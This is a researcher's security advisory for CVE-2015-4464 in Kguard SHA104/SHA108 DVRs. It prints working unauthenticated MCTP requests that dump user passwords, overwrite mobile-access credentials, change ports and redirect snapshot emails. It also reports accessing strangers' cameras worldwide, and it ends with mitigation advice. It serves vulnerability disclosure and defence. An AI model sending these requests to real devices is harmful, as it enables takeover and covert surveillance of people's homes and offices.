CVE-2015-4464: MULTIPLE VULNERABILITIES WITH KGUARD DIGITAL VIDEO RECORDERS
http://www.securityfocus.com/archive/1/534830
Researcher: Federick Joe Fajardo / fjpfajardo(at)ph.ibm.com
Initial disclosure: February 10, 2015
CVE assigment: June 10, 2015
Proof of Concept: June 15, 2015
PROOF OF CONCEPT CAN BE DOWNLOADED AT: https://goo.gl/L5ASRo
PRODUCT DESCRIPTION
The Kguard SHA104 & SHA108 are 4ch/8ch H.264 DVRs designed for economical
application. It's stylish & streamlines hardware design and excellent
performance can be fast moving, competitive and an ideal solution for entry
level & distribution channels.
VENDOR REFERENCE:
http://us.kworld-global.com/main/prod_in.aspx?
mnuid=1306&modid=10&prodid=527
1
VULNERABILITY DESCRIPTION
1. Insufficient authentication and authorization
Kguard SHA104 / SHA108 Insufficient Authorization Checks Request Handling
Remote Authentication Bypass, http://osvdb.org/show/osvdb/119402
A deficiency in handling authentication and authorization has been found
with Kguard 104/108 models. While password-based authentication is used by
the ActiveX component to protect the login page, all the communication to
the application server at port 9000 allows data to be communicated directly
with insufficient or improper authorization.
The request HI_SRDK_SYS_USERMNG_GetUserList for example will show all the
usernames in the system together with their passwords. The below example is
an actual unmodified request and response by the server.
2
REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0
CSeq:6
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:51
3Segment-Num:1
Segment-Seq:1
Data-Length:4
VMCTP/1.0 200 OK
Content-Type:text/HDP
CSeq:6
Return-Code:0
Content-Length:2326
Segment-Num:2
Segment-Seq:1
Data-Length:2240
eric
111222
111222
admin
111222
111222
333444
333444
555666
555666
user4
user5
user6
Segment-Seq:2
Data-Length:4
An interesting request is HI_SRDK_NET_MOBILE_GetOwspAttr. If configured,
this allows mobile devices to access and monitor the cameras at port 18004.
An actual unmodified request and response is shown below.
REMOTE HI_SRDK_NET_MOBILE_GetOwspAttr MCTP/1.0
CSeq:15
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:15
Segment-Num:0
VMCTP/1.0 200 OK
Content-Type:text/HDP
CSeq:15
3
Return-Code:0
Content-Length:161
Segment-Num:1
Segment-Seq:1
Data-Length:112
admin
111222
From this example, the credentials to this user can be changed easily by
executing the HI_SRDK_NET_MOBILE_SetOwspAttr request as shown below and can
be saved in memory by executing HI_SRDK_DEV_SaveFlash:
REMOTE HI_SRDK_NET_MOBILE_SetOwspAttr MCTP/1.0
CSeq:1
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:161
Segment-Num:1
Segment-Seq:1
Data-Length:112
admin.t..|A<.......n(...........111222444.eted!.p.c<.... ...
...TF..............................................
The logs from the application server can confirm that the execution was
successful:
[MCTP] [HI_MCTP_MethodProc_Remote] SUCCESS!!!!!
/
home/yala/svn/D9108_MLANG_QSEE/dvr/modules/vscp/mctp/server/hi_vscp_mctp_mt
hdproc.c
606========================
4
GetNetworkState:192.168.254.200
Logs from the DVR also shows that an existing mobile device that tries to
connect on port 18004 with previous credentials stored will fail:
< StreamingServer> [ run] A
client(116) connected[2010-09-11 12:30].
< LangtaoCommProto> [ handlePacketBody] Input
buffer total length: 60
< LangtaoCommProto> [ handlePacketBody] tlv type:
41
< LangtaoCommProto> [ handlePacketBody] tlv
length: 56
< LangtaoCommProto> [ handlePacketBody] Login
request received.
< LangtaoCommProto> [ handleLoginReq] User Name:
admin Passwrod: 111222
< LangtaoCommProto> [ handleLoginReq] User name
and/or password validate fail.
< StreamingServer> [ handleRequest2] Send
response to client.
< StreamingServer> [ handleRequest2] Session
closed actively.
< StreamingServer> [ run] Handle
request fail.
----------------------- SESSION(116) END -----------------------
2. Lack of transport security
Kguard SHA104 / SHA108 HiDvrOcx.cab ActiveX Unencrypted Transmision MitM
Request Manipulation, http://osvdb.org/show/osvdb/119422
The communication to the application server is done by an unprotected
ActiveX component that is presented to the browser's initial session. The
lack of transport encryption may allow us to exploit possible request from
this component to the application server. This file is named as
HiDvrOcx.cab.
Decompiling the file will allow us to see the libraries being used:
-rw-rw-r--. 1 fjpfajardo fjpfajardo 1443576 Mar 11 2011 HiDvrOcx.ocx
-rw-rw-r--. 1 fjpfajardo fjpfajardo 1443 Mar 11 2011 HiDvrOcx.inf
-rw-rw-r--. 1 fjpfajardo fjpfajardo 27136 Mar 11 2011 HiDvrOcxESN.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxITA.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxBRG.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 20992 Mar 11 2011 HiDvrOcxJPN.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 155648 Mar 11 2011 HiDvrNet.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 487525 Mar 11 2011 HiDvrMedia.dll
5
Interestingly, checking the DLL file named HiDvrNet.dll will reveal other
types of controls which can be presented to the application server as well:
HI_SRDK_NET_MOBILE_GetOwspAttr
HI_SRDK_NET_MOBILE_SetAttr
HI_SRDK_NET_MOBILE_SetOwspAttr
HI_SRDK_NET_Network_DHCP_Client_GetAttr
HI_SRDK_NET_Network_DHCP_Client_SetAttr
HI_SRDK_NET_Network_GetDNSList
HI_SRDK_NET_Network_GetDefaultGateway
HI_SRDK_NET_Network_GetNetdevAttr
HI_SRDK_NET_Network_GetNetdevName
HI_SRDK_NET_Network_SetDNSList
HI_SRDK_NET_Network_SetDefaultGateway
HI_SRDK_NET_Network_SetNetdevAttr
HI_SRDK_NET_SetDdnsAttr
HI_SRDK_NET_SetEmailAttr
HI_SRDK_NET_SetIppreviewVodAttr
HI_SRDK_NET_SetMctpServerPort
HI_SRDK_NET_SetPppoeAttr
HI_SRDK_NET_SetWebServerPort
HI_SRDK_Open_Device
HI_SRDK_RECORDER_GetPlaybackAttr
HI_SRDK_RECORDER_GetRecordAttr
HI_SRDK_RECORDER_GetRecordSchedule
HI_SRDK_RECORDER_SetRecordAttr
HI_SRDK_RECORDER_SetRecordSchedule
HI_SRDK_SYS_GetDaylightAttr
HI_SRDK_SYS_GetSysMaintainAttr
HI_SRDK_SYS_GetSystemAttr
HI_SRDK_SYS_SetDaylightAttr
HI_SRDK_SYS_SetSysMaintainAttr
HI_SRDK_SYS_SetSystemAttr
HI_SRDK_SYS_USERMNG_AddGroup
HI_SRDK_SYS_USERMNG_AddUser
HI_SRDK_SYS_USERMNG_DelGroup
HI_SRDK_SYS_USERMNG_DelUser
HI_SRDK_SYS_USERMNG_Disable
HI_SRDK_SYS_USERMNG_Enable
HI_SRDK_SYS_USERMNG_GetAuthorityList
HI_SRDK_SYS_USERMNG_GetGroupList
HI_SRDK_SYS_USERMNG_GetUserList
HI_SRDK_SYS_USERMNG_ModifyGroupInfo
HI_SRDK_SYS_USERMNG_ModifyUserInfo
6
3. Denial of Service and Command Injection
Kguard SHA104 / SHA108 Multiple Field Handling Remote Command Execution,
http://osvdb.org/show/osvdb/119403
Input are not sanitized and filtered in some of the fields which may lead
to a potential passive Denial of Service and/or command injection. By
altering some requests such as HI_SRDK_NET_SetPppoeAttr,
HI_SRDK_NET_Network_DHCP_Client_SetAttr, HI_SRDK_NET_SetWebServerPort or
HI_SRDK_NET_Network_SetDefaultGateway, a malicous user may be able to
disrupt connectivity to the DVR.
REMOTE HI_SRDK_NET_SetMctpServerPort MCTP/1.0
CSeq:58
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:49
1Segment-Num:1
Segment-Seq:1
Data-Length:2
REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0
CSeq:61
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:15
Segment-Num:0
The device has no authentication and authorization method from the ActiveX
component to the application server allowing anyone to directly interfere
with the applicaton server's controls and make unauthorized modification of
the device's configuration file.
As an example, by passing the request REMOTE HI_SRDK_NET_SetEmailAttr,
anyone will be able to “change” the value of the DVR's email functionality
where snap images from camera may be sent to an email address compromising
“Privacy”.
7
REMOTE HI_SRDK_NET_SetEmailAttr MCTP/1.0
CSeq:1
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:3426
Segment-Num:1
Segment-Seq:1
Data-Length:3376
The application server that listens for incoming requests at port 9000 is
run by a binary called raysharp_dvr which suggest that the hardware
manufacturer is Zhuhai RaySharp Technology Co. While the purpose for this
vulnerability analysis is mainly for Kguard related DVR's, I believe that
other devices that use the same firmware by the manufacturer and rebranded
in the market are also vulnerable.
576 root 20696 S ./raysharp_dvr
577 root 20696 S ./raysharp_dvr
578 root 20696 S ./raysharp_dvr
CAMERAS FROM AROUND THE WORLD
Digital Video Recorders (DVR's) are detective controls which are meant to
be an integral part of a physical and logical security implementation. But
what happens if the device you are using for surveillance is the same
device that hackers are using to watch over your shoulder?
Below are some of the cameras I have visited from around the world. All of
these security cameras are connected to a vulnerable device which were
exploited using the vulnerability. Please take note that none of the
configuration from these devices has been changed. The credentials has been
removed after creating this document and the screen captures were gathered
for the purpose of creating the proof of concept only.
8
The following links shows the screenshots on how to run the POC:
https://goo.gl/SLKSqx
https://goo.gl/Wa42ZX
https://goo.gl/O2PPzh
https://goo.gl/lDqHdC
FIX AND RESOLUTION
Currently there is no fix or known firmware update for this vulnerability.
I own the device myself and I used to connect to this device for remote
monitoring. Buying another DVR isn't practical for me, but totally ignoring
this problem isn't good for me either. If your device is connected to the
Internet from a public IP address, there is a risk that your device may be
exposed and exploited. However, you can do the following setup to prevent
someone from breaking to your device:
1. If you do not need to do remote monitoring, do not connect/hook your
device directly to the Internet.
2. The device must be connected and accessible only to your local network.
This will lessen the chance that someone might be watching your home or
office from other parts of the world.
3. If remote monitoring is required, change the default ports of the
device. The default ports are: TCP/80, TCP/5000, TCP/9000, TCP/18004.
These ports must be set to a higher port value where the chance of being
scanned are lesser.
4. If you are monitorin the device remotely from a location where static IP
is configured, setup the firewall for the device to accept only traffic
from that IP address.
5. If mobile monitoring matters to you, configure a VPN access on your
network so remote connections to the device are tunnelled and treated as
local connections. I am using this setup via OpenVPN.
EOF
9